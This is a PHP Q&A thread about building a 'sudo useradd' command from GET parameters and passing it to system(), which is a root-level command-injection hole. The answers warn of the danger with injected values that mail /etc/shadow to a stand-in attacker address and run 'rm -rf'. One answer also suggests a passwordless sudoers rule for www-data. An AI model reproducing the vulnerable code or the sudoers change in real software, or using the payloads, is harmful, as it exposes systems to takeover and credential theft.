# problems with System() PHP

Tags: php

I have an code in PHP but i have 1 problem that i can't understand.
I just want to create a local user in my computer
when i use system() my page don't show/do anything

```
<?php
session_start();
//inici de la sessio
//cridem al fitxer de connexions
include 'connexio.php';
//taula de la bbdd
include 'header.php';
mysql_select_db('easyadmin');

        $usuari = $_GET["user"];
        $contrasenya = $_GET["password"];
        $carpeta = $_GET["home"];
        $grup = $_GET["group"];
        $ShellUnix = $_GET["shell"];
        echo "usuari: $usuari";
        echo "la pass: $contrasenya";
        echo "carpta: $carpeta";
        echo "el grup: $grup";
        echo "shell: $ShellUnix";

//system("sudo useradd -d ".$carpeta." -m -g ".$grup." -s ".$ShellUnix $usuari);
/*
if(!system('sudo useradd -d '.$carpeta.' -m -g'.$grup.' -s'.$ShellUnix $usuari'))
{
 echo "error al crear un usuari";
 // header("Location: principal.php");
}else{
 echo "el usuari ".$usuari." se ha creat correctament";
 // header("Location: cusuari.php");
}

mysql_close($conexio);
*/
?>
```

no one works.

thanks a lot

Comment: That's actually good that it doesn't work!!

Comment: Most of your code is commented out.  .... Is that why it doesn't work?

Comment: I suppose my main question is... why would you do this???

Comment: Sorry, we have to descomment the code, i know that now doesent work

Comment: Don't... just don't do this. Any of this. Please, think of security.

Answer (score 1):

This is incredibly dangerous.  You are passing untrusted data to a command that you are executing.  Worse, that command is being run as root.

If a bad guy submits a value for the user of

```
somename; cat /etc/passwd /etc/shadow | mail badguy@example.com
```

then you have just mailed your password file to the bad guy who now can crack your passwords.

Running commands built with outside data is like eating soup made from ingredients found on your doorstep.

Answer (score 0):

To allows www-data to run the useradd command, you need to add a line to /etc/sudoers like

```
www-data ALL=(root) NOPASSWD: /usr/sbin/useradd
```

You may also need to comment out this line, if it exists in /etc/sudoers:

```
Defaults requiretty
```

Comment: And then wave goodbye to any semblance of security that your machine may have ever had.

Answer (score 0):

`sudo` is trying to ask you for the user's password to authenticate the command. However, `system()` allows no such back-and-forth. At least, not in a server API context (ie. loaded in your browser).

You *may* be able to do this if you use [`passthru`](http://php.net/passthru) and are running it on a command line (such as bash) - I use this myself on Windows, using PHP CLI to make console applications that include such calls as `CHOICE` and `PAUSE`.

Alternatively, you should find out what user runs the PHP scripts (`` echo `whoami`; `` should do it), and grant that user permission to run the `useradd` command without needing a password.

Also, be VERY careful running sensitive commands like this. ALWAYS use [`escapeshellarg`](http://php.net/escapeshellarg) on each argument individually to ensure the command does exactly what you intend it to. After all, I could enter my username as `Robert && rm -rf ./` and because you gave it `sudo` permission, bye-bye system!